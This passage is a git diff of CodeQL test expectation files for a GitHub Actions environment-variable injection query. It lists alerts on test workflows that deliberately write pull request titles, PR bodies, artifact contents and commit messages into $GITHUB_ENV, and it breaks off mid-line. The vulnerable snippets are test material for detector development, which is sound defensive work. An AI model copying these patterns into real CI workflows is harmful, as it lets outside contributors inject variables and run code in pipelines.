@@ -58,10 +57,10 @@ nodes | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | semmle.label | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | semmle.label | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:19:9:27:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r 
'.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | semmle.label | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:20:9:26:6 | Uses Step | semmle.label | Uses Step | 
@@ -72,6 +71,12 @@ nodes | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:55:9:61:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | semmle.label | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | semmle.label | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | semmle.label | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | semmle.label | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | semmle.label | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | semmle.label | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> 
"$GITHUB_ENV"\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -90,12 +95,18 @@ subpaths | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | | .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 82602ee8ed88..1ac092dd0d3b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected 
@@ -1,30 +1,29 @@ edges -| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | -| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | -| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | 
.github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | -| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | -| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:33:14:35:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:37:14:38:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test8.yml:26:9:32:6 | Uses Step | .github/workflows/test8.yml:40:14:41:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | 
pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | | -| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | | -| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:55:9:61:6 | Uses Step | provenance | | -| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | -| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | 
github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo 